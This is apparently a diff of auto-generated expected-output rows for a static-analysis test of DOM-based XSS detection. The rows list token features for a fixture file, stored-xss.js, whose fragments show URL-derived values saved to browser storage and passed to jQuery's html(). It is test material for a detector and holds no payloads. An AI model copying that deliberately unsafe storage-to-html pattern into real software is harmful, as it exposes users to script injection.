tokenFeatures | autogenerated/Xss/DomBasedXss/stored-xss.js:19:38:19:44 | 'local' | enclosingFunctionName | | | autogenerated/Xss/DomBasedXss/stored-xss.js:19:38:19:44 | 'local' | fileImports | | | autogenerated/Xss/DomBasedXss/stored-xss.js:19:38:19:44 | 'local' | receiverName | localStorage | +| autogenerated/Xss/DomBasedXss/stored-xss.js:20:9:20:13 | href2 | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:20:9:20:13 | href2 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:20:9:20:13 | href2 | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:20:9:20:13 | href2 | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:20:9:20:13 | href2 | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:20:9:20:27 | exceptional return of href2.indexOf("\\"") | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:20:9:20:27 | exceptional return of href2.indexOf("\\"") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:20:9:20:27 | exceptional return of href2.indexOf("\\"") | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:20:9:20:27 | exceptional return of href2.indexOf("\\"") | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:20:9:20:27 | exceptional return of href2.indexOf("\\"") | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:20:9:20:27 | href2.indexOf("\\"") | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:20:9:20:27 | href2.indexOf("\\"") | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:20:9:20:27 | href2.indexOf("\\"") | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:20:9:20:27 | href2.indexOf("\\"") | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:20:9:20:27 | href2.indexOf("\\"") | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:20:9:20:34 | href2.i ... !== -1 | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:20:9:20:34 | href2.i ... !== -1 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:20:9:20:34 | href2.i ... !== -1 | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:20:9:20:34 | href2.i ... !== -1 | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:20:9:20:34 | href2.i ... !== -1 | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:20:15:20:21 | indexOf | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:20:15:20:21 | indexOf | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:20:15:20:21 | indexOf | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:20:15:20:21 | indexOf | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:20:15:20:21 | indexOf | fileImports | | | autogenerated/Xss/DomBasedXss/stored-xss.js:20:23:20:26 | "\\"" | CalleeFlexibleAccessPath | href2.indexOf | | autogenerated/Xss/DomBasedXss/stored-xss.js:20:23:20:26 | "\\"" | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/stored-xss.js:20:23:20:26 | "\\"" | contextFunctionInterfaces | | @@ -15410,6 +109570,46 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/stored-xss.js:20:23:20:26 | "\\"" | enclosingFunctionName | | | autogenerated/Xss/DomBasedXss/stored-xss.js:20:23:20:26 | "\\"" | fileImports | | | autogenerated/Xss/DomBasedXss/stored-xss.js:20:23:20:26 | "\\"" | receiverName | href2 | +| autogenerated/Xss/DomBasedXss/stored-xss.js:20:33:20:34 | -1 | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:20:33:20:34 | -1 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:20:33:20:34 | -1 | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:20:33:20:34 | -1 | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:20:33:20:34 | -1 | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:20:34:20:34 | 1 | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:20:34:20:34 | 1 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:20:34:20:34 | 1 | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:20:34:20:34 | 1 | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:20:34:20:34 | 1 | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:23:5:23:5 | $ | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:23:5:23:5 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:23:5:23:5 | $ | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:23:5:23:5 | $ | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:23:5:23:5 | $ | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:23:5:23:13 | $('myId') | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:23:5:23:13 | $('myId') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:23:5:23:13 | $('myId') | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:23:5:23:13 | $('myId') | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:23:5:23:13 | $('myId') | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:23:5:23:13 | exceptional return of $('myId') | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:23:5:23:13 | exceptional return of $('myId') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:23:5:23:13 | exceptional return of $('myId') | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:23:5:23:13 | exceptional return of $('myId') | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:23:5:23:13 | exceptional return of $('myId') | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:23:5:23:18 | $('myId').html | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:23:5:23:18 | $('myId').html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:23:5:23:18 | $('myId').html | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:23:5:23:18 | $('myId').html | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:23:5:23:18 | $('myId').html | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:23:5:23:58 | $('myId ... r") | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:23:5:23:58 | $('myId ... r") | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:23:5:23:58 | $('myId ... r") | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:23:5:23:58 | $('myId ... r") | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:23:5:23:58 | $('myId ... r") | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:23:5:23:58 | exceptional return of $('myId ... r") | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:23:5:23:58 | exceptional return of $('myId ... r") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:23:5:23:58 | exceptional return of $('myId ... r") | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:23:5:23:58 | exceptional return of $('myId ... r") | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:23:5:23:58 | exceptional return of $('myId ... r") | fileImports | | | autogenerated/Xss/DomBasedXss/stored-xss.js:23:7:23:12 | 'myId' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/stored-xss.js:23:7:23:12 | 'myId' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/stored-xss.js:23:7:23:12 | 'myId' | contextFunctionInterfaces | | @@ -15417,12 +109617,22 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/stored-xss.js:23:7:23:12 | 'myId' | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | | autogenerated/Xss/DomBasedXss/stored-xss.js:23:7:23:12 | 'myId' | enclosingFunctionName | | | autogenerated/Xss/DomBasedXss/stored-xss.js:23:7:23:12 | 'myId' | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:23:15:23:18 | html | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:23:15:23:18 | html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:23:15:23:18 | html | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:23:15:23:18 | html | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:23:15:23:18 | html | fileImports | | | autogenerated/Xss/DomBasedXss/stored-xss.js:23:20:23:33 | "\\n something | | autogenerated/Xss/DomBasedXss/stored-xss.js:23:20:23:33 | "\\nfoobar' | +| autogenerated/Xss/DomBasedXss/stored-xss.js:23:20:23:41 | "\\n something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:23:20:23:41 | "\\n" | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/DomBasedXss/stored-xss.js:23:20:23:57 | "\\n" | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/stored-xss.js:23:20:23:57 | "\\n" | contextFunctionInterfaces | | @@ -15442,6 +109652,46 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/stored-xss.js:23:45:23:57 | ">foobar" | enclosingFunctionName | | | autogenerated/Xss/DomBasedXss/stored-xss.js:23:45:23:57 | ">foobar" | fileImports | | | autogenerated/Xss/DomBasedXss/stored-xss.js:23:45:23:57 | ">foobar" | stringConcatenatedWith | '\nfoobar href indexOf " 1 $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:25:9:25:13 | href3 | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:25:9:25:13 | href3 | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:25:9:25:45 | href3 | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:25:9:25:45 | href3 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:25:9:25:45 | href3 | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:25:9:25:45 | href3 | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:25:9:25:45 | href3 | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:25:9:25:45 | href3 = ... local') | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:25:9:25:45 | href3 = ... local') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:25:9:25:45 | href3 = ... local') | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:25:9:25:45 | href3 = ... local') | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:25:9:25:45 | href3 = ... local') | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:25:17:25:28 | localStorage | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:25:17:25:28 | localStorage | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:25:17:25:28 | localStorage | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:25:17:25:28 | localStorage | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:25:17:25:28 | localStorage | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:25:17:25:36 | localStorage.getItem | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:25:17:25:36 | localStorage.getItem | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:25:17:25:36 | localStorage.getItem | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:25:17:25:36 | localStorage.getItem | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:25:17:25:36 | localStorage.getItem | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:25:17:25:45 | exceptional return of localSt ... local') | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:25:17:25:45 | exceptional return of localSt ... local') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:25:17:25:45 | exceptional return of localSt ... local') | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:25:17:25:45 | exceptional return of localSt ... local') | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:25:17:25:45 | exceptional return of localSt ... local') | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:25:17:25:45 | localSt ... local') | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:25:17:25:45 | localSt ... local') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:25:17:25:45 | localSt ... local') | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:25:17:25:45 | localSt ... local') | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:25:17:25:45 | localSt ... local') | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:25:30:25:36 | getItem | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:25:30:25:36 | getItem | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:25:30:25:36 | getItem | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:25:30:25:36 | getItem | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:25:30:25:36 | getItem | fileImports | | | autogenerated/Xss/DomBasedXss/stored-xss.js:25:38:25:44 | 'local' | CalleeFlexibleAccessPath | localStorage.getItem | | autogenerated/Xss/DomBasedXss/stored-xss.js:25:38:25:44 | 'local' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/stored-xss.js:25:38:25:44 | 'local' | contextFunctionInterfaces | | @@ -15450,6 +109700,31 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/stored-xss.js:25:38:25:44 | 'local' | enclosingFunctionName | | | autogenerated/Xss/DomBasedXss/stored-xss.js:25:38:25:44 | 'local' | fileImports | | | autogenerated/Xss/DomBasedXss/stored-xss.js:25:38:25:44 | 'local' | receiverName | localStorage | +| autogenerated/Xss/DomBasedXss/stored-xss.js:26:9:26:13 | href3 | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:26:9:26:13 | href3 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:26:9:26:13 | href3 | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:26:9:26:13 | href3 | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:26:9:26:13 | href3 | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:26:9:26:27 | exceptional return of href3.indexOf("\\"") | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:26:9:26:27 | exceptional return of href3.indexOf("\\"") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:26:9:26:27 | exceptional return of href3.indexOf("\\"") | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:26:9:26:27 | exceptional return of href3.indexOf("\\"") | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:26:9:26:27 | exceptional return of href3.indexOf("\\"") | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:26:9:26:27 | href3.indexOf("\\"") | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:26:9:26:27 | href3.indexOf("\\"") | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:26:9:26:27 | href3.indexOf("\\"") | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:26:9:26:27 | href3.indexOf("\\"") | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:26:9:26:27 | href3.indexOf("\\"") | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:26:9:26:34 | href3.i ... !== -1 | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:26:9:26:34 | href3.i ... !== -1 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:26:9:26:34 | href3.i ... !== -1 | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:26:9:26:34 | href3.i ... !== -1 | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:26:9:26:34 | href3.i ... !== -1 | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:26:15:26:21 | indexOf | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:26:15:26:21 | indexOf | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:26:15:26:21 | indexOf | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:26:15:26:21 | indexOf | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:26:15:26:21 | indexOf | fileImports | | | autogenerated/Xss/DomBasedXss/stored-xss.js:26:23:26:26 | "\\"" | CalleeFlexibleAccessPath | href3.indexOf | | autogenerated/Xss/DomBasedXss/stored-xss.js:26:23:26:26 | "\\"" | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/stored-xss.js:26:23:26:26 | "\\"" | contextFunctionInterfaces | | @@ -15458,6 +109733,46 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/stored-xss.js:26:23:26:26 | "\\"" | enclosingFunctionName | | | autogenerated/Xss/DomBasedXss/stored-xss.js:26:23:26:26 | "\\"" | fileImports | | | autogenerated/Xss/DomBasedXss/stored-xss.js:26:23:26:26 | "\\"" | receiverName | href3 | +| autogenerated/Xss/DomBasedXss/stored-xss.js:26:33:26:34 | -1 | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:26:33:26:34 | -1 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:26:33:26:34 | -1 | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:26:33:26:34 | -1 | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:26:33:26:34 | -1 | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:26:34:26:34 | 1 | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:26:34:26:34 | 1 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:26:34:26:34 | 1 | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:26:34:26:34 | 1 | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:26:34:26:34 | 1 | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:29:5:29:5 | $ | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:29:5:29:5 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:29:5:29:5 | $ | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:29:5:29:5 | $ | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:29:5:29:5 | $ | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:29:5:29:13 | $('myId') | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:29:5:29:13 | $('myId') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:29:5:29:13 | $('myId') | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:29:5:29:13 | $('myId') | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:29:5:29:13 | $('myId') | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:29:5:29:13 | exceptional return of $('myId') | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:29:5:29:13 | exceptional return of $('myId') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:29:5:29:13 | exceptional return of $('myId') | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:29:5:29:13 | exceptional return of $('myId') | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:29:5:29:13 | exceptional return of $('myId') | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:29:5:29:18 | $('myId').html | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:29:5:29:18 | $('myId').html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:29:5:29:18 | $('myId').html | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:29:5:29:18 | $('myId').html | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:29:5:29:18 | $('myId').html | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:29:5:29:74 | $('myId ... '') | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:29:5:29:74 | $('myId ... '') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:29:5:29:74 | $('myId ... '') | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:29:5:29:74 | $('myId ... '') | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:29:5:29:74 | $('myId ... '') | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:29:5:29:74 | exceptional return of $('myId ... '') | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:29:5:29:74 | exceptional return of $('myId ... '') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:29:5:29:74 | exceptional return of $('myId ... '') | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ 